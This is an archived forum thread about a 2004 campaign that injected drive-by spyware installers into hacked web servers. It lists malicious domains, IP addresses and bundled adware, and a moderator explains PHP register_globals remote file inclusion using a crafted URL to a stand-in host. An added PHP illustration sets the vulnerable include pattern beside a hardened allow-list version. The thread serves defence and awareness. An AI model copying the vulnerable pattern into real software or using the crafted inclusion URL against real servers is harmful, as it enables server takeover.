Full Version: World Wide Exploit via servers
BleepingComputer.com > Security > Breaking Virus & Security News
TeMerc
From DSLR, by Eric Howes:
QUOTE
Hi All:

Some of you may have seen one of today's new stories about a stealth installation exploit that Ben Edelman wrote up and published on his web site:

»www.benedelman.org/news/111804-1.html

Included with Ben's write-up is an eye-opening video. Ben's web site is down at the moment, unfortunately -- too much traffic. Edit: see Ben's post below -- his site is back up.

I thought you all might like some additional information about the exploit that Ben documented.

This is a developing story and our information is still incomplete, so the information presented here may need to be revised in the light of new developments.

It appears that a group of hackers (perhaps even a criminal gang) is hacking web servers all over the Net and installing root kits that dynamically inject code into the pages served from the compromised web servers. The injected code effectively serves as a "front door" to a number of different pages at these domains:

sp2bleeped.biz
splitinfinity.info
xpire.info

Those pages use several security exploits to stealth install a variety of different software packages on users' PCs, all without any warning whatsoever. Several other domains are used in that installation/exploit process, including:

69.50.168.147
195.178.160.30
213.159.117.133
b00gle.info
coolsearch.biz
newiframe.biz
pizdato.biz

Fair warning: do NOT visit any of these domains unless your box is well defended and updated, and you are prepared to deal with the unexpected.

The software installed on users' PCs appears to vary. Sometimes the exploit pages listed above push porn dialers onto victims' PCs; other times a whole host of spyware and adware packages is installed, as in Ben's test. The packages that we've seen installed via this exploit include:

180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
WhenU (VVSN)
Window AdControl
WindUpdates
YourSiteBar

The screenshot included with this post comes from the video that Ben made, and it gives a sense for the great variety of junk that can be installed.

We have started seeing evidence of this exploit in victims' HJT logs at several anti-spyware forums -- a few samples:

»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»castlecops.com/postlite85832-sp2bleeped..
»castlecops.com/postlite86439-sp2bleeped..
»castlecops.com/postlite86459-sp2bleeped..
»castlecops.com/postlite87626-sp2bleeped..
»computercops.biz/postp364469.html
»computercops.biz/postp364553.html
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forum.aumha.org/viewtopic.php?t=9340
»www.trojaner-board.de/archive/index.ph..

There have been a few other public discussion threads on the Net about this exploit. In particular, see:

»www.gossamer-threads.com/lists/fulldis..
»seclists.org/lists/fulldisclosure/2004..

Wayne Porter has some interesting comments on this exploit:

»www.revenews.com/wayneporter/archives/..

I might add that I stumbled upon this because of a post by Andrew Clover (of doxdesk.com fame) in response to the Aluria/WhenU controversy:

»www.aluriasoftware.com/forum/thread351..

In closing, I should note that the latest updates for IE-SPYAD and AGNIS (released last night) include all of the key domains documented here.

I'll be posting with more information as it becomes available.

Best,

Eric L. Howes

Everyone needs to read this thread and spread the word about it.
http://www.broadbandreports.com/forum/rema...04374~mode=flat
Grinler
Good read.

It seems they are breaking in, possibly through register_globals variable injection in PHP. For those who do not understand programming, I will try to explain it in a way that is easy to understand and simplified.

PHP, which is a popular programming language for dynamic websites, contains a setting called register_globals. In the newer versions of PHP this setting is set to off, though many people still use it. If you are using an older version, pre 4.2.0, this will be on by default. In this context, register_variables will take a form variable and automatically make it a variable in the PHP program. This means that anyone could create a valid variable, even overwriting existing ones in the program, via properly formed URLs.

For example, the following GET URL can be used to create two variables in a program, called $badsite and $evilprogram.

Let's say I had a program called test.php and it resided on testdomain.com.

If I crafted a URL like this:

http://www.testdomain.com/test.php?badsite=http://www.examplesite.com&evilprogram=infection.php

and went to it in a browser, the test.php program would run and create two variables: one called $badsite, set equal to http://www.examplesite.com, and another called $evilprogram, set equal to infection.php.

In most cases this does not matter, as the hacker does not know the variable names you used in your program. The problem arises when the exploiter knows the program that you are running. Remember when I said that you can overwrite variables in a PHP program by using a URL like the one above? Now what if you were running an open source program whose source code was readily available? Then anyone in the world would know the code and the variables being used. Now if your server has register_variables set to on, a user could overwrite your variables with data of their choice. In some cases they can use this method to change the behaviour of your program.

But what if they could use this method to run any code they wanted on your machine? Literally any code. This can be done if the program uses an include statement with a variable in it. An include statement simply allows you to include code from a file located on your computer, or off it, into the running program. The contents of the included file will add its code to the original program.

Let's say you had some code like this:

include("$include/function.php");

If you do not set the $include variable to something specific, then I can craft a URL that looks like this:

http://www.testdomain.com/test.php?include=http://www.examplesite.com

Now when the test.php program is run, it will include the function.php program from the following site:

http://www.examplesite.com/function.php

As the site examplesite.com is under your control, you can put whatever code you want into the function.php residing there. That code can do anything from adding users to the machine, giving you more access, or deleting files.


As you can see this is some scary stuff.

I hope this makes sense and gives you a glimpse into how these people work and can do what they do.
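Added example (editor's illustration, not code from this thread, from Ben Edelman's write-up, or from any real application): the include pattern Grinler describes, side by side with a hardened version. It assumes a hypothetical script whose legitimate includes live in a `lib/` directory. register_globals has been removed from PHP, so `extract()` on the request array is used to reproduce its effect; both functions return the path that `include()` would have received instead of actually including it, so nothing is fetched from the network when you run it.

```php
<?php
// Added example, not code from the thread above or from any real application.
// Emulates the register_globals behaviour described in the post: every request
// parameter becomes a PHP variable. register_globals was removed in PHP 5.4,
// so extract() on the request array is used here to reproduce the effect.
// The functions return the path include() would have received rather than
// calling include(), so the demo never fetches remote code.

// --- Vulnerable pattern (do not deploy) ---
function vulnerable_include_path(array $get): string
{
    extract($get);                    // register_globals: ?include=X  ->  $include = "X"
    // $include was never initialised by the script, so the attacker's value wins.
    return "$include/function.php";
}

// --- Hardened pattern ---
// 1. Read request data explicitly from the request array, never from
//    auto-created variables.
// 2. Map a short key to a fixed file through an allow-list, so no part of the
//    include path comes from the request.
// 3. Initialise every variable before use.
// 4. In php.ini keep register_globals=Off and allow_url_include=Off.
const INCLUDE_MAP = [
    'search'  => 'lib/search.php',    // hypothetical files for this example
    'profile' => 'lib/profile.php',
];

function safe_include_path(array $get): ?string
{
    $key = isset($get['module']) ? (string) $get['module'] : 'search';
    if (!array_key_exists($key, INCLUDE_MAP)) {
        return null;                  // unknown module: refuse (and log it)
    }
    return __DIR__ . '/' . INCLUDE_MAP[$key];
}

// Constructed attacker request, mirroring the crafted URL in the post:
//   test.php?include=http://www.examplesite.com&module=http://www.examplesite.com
$attack = [
    'include' => 'http://www.examplesite.com',
    'module'  => 'http://www.examplesite.com',
];

echo "vulnerable include path: ", vulnerable_include_path($attack), PHP_EOL;
echo "hardened, attacker key:  ", var_export(safe_include_path($attack), true), PHP_EOL;
echo "hardened, valid key:     ", safe_include_path(['module' => 'profile']), PHP_EOL;
```

Run it with `php test.php` from the command line. The vulnerable function hands the attacker's URL straight to the include path, which is exactly the remote file inclusion the post describes; the hardened function only ever returns one of the two paths it was written with, and rejects anything else.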
phawgg
Sites not to visit are certainly clear enough...and a solid endorsement of the effectiveness of IE-SPYAD, too. I'm still a bit cloudy regarding the programming, but that was a darn good effort, Grinler. Thanks to both you & TeMerc for being concerned about the wellbeing and understanding of the "basic-user" like me.
TeMerc
Just a quick update.

We have been working all weekend with several security experts from Panda and MS on this exploit, or, it seems, two exploits.

The craftiness of these guys is deeper than originally thought to be. There still is no clear reason for why it's being done just yet.

The FTC has been alerted to the problem, as has SANS. We have tracked down several infected servers, and contacted the admins of said servers. A UK news site got hit with it too:
http://www.theregister.co.uk/2004/11/21/re...dserver_attack/

We have also gathered lots of other important documentation to try and find the people behind this, but it's extremely difficult. The best thing we can do is to warn everyone we know about the potential for a problem.

Wish I could elaborate more, but that's enough for now.
Grinler
Just so everyone knows, I am now caught up with the situation that TeMerc is referring to and it's quite nasty. As more information is released to the public we will tell you about it here.

It does not seem that they are using the hack as described above but two other exploits. We'll let you know more as it's released.
Tweener
I believe I am a victim of this. If I can be of any help to your research, please let me know. I have been unsuccessful in my attempts to clean the system. A step by step effort is documented here: http://www.bleepingcomputer.com/forums/topic5508.html .
TeMerc
Actually, I do not think you are a victim of this exploit. If you were, you would have some of the items listed in the original thread, such as:
180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
WhenU (VVSN)
Window AdControl
WindUpdates
YourSiteBar

Nor do you have any of these in your
sp2bleeped.biz
splitinfinity.info
xpire.info

Those are the major indicators of the infection.
You seem to have just some regular, run of the mill malware, although it's annoying just the same.
Tweener
Yes, many of these were present early in the infection. After I disconnected from my router, I cleaned them with Adaware and Spybot S&D before running HJT. A few that I remember for sure were:

180solutions
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
TIB Browser
WebRebates (TopMoxie)

In addition there was

Virtual Bouncer

The infection ran in a fashion very similar to the video recording on http://www.benedelman.org/news/111804-1.html . I saw some of the exact same windows and prompts. But since I pulled the plug (literally!) as soon as what was happening became apparent, not all the adware that probably would have been installed was installed.

An interesting note is that by entering safe mode with all files viewable, I have run a search for files created during the exact time period of the beginning of the infection. Since no other solution has worked, I deleted all files created in those two minutes, but am holding them in my recycle bin for the time being. If the infection seems to have been halted (no more unprompted installations), I will make these files available for you all to study. There were multiple .exe and .dll files in this list.
KoanYorel
Good for you Tweener, on keeping track of what was happening with your system!

Should you forward these files onward, please ensure that you only send them in a "Zipped" file to preclude infecting the recipients.

I'm sure there will be several members that will request that you forward those files to them for further study.

regards,
~Koan
Tweener
Update: Over three hours now and no sign of the infection left. I ran the Trend Micro Housecall online scan and it identified 9 of the files I removed from the Windows and System folders as trojans or backdoors, including one key logger! I changed my router password from this computer because of that just to be safe even though remote admin is disabled. Two others were identified as well, so I moved them to the same folder where the others are contained. Adaware is only detecting tracking cookies again, and Spybot S&D only buggily detects the DSO exploit. Think I'll stick with Netscape from now on.
KoanYorel
You might also explore Firefox or Mozilla as another alternative.

I have several browsers I use. Mainly Firefox now.

(BTW - Acquaintances of mine that use "Netscape" have been having problems similar to those who continue to use "IE"!)

regards,
~Koan
Invision Power Board © 2001-2008 Invision Power Services, Inc.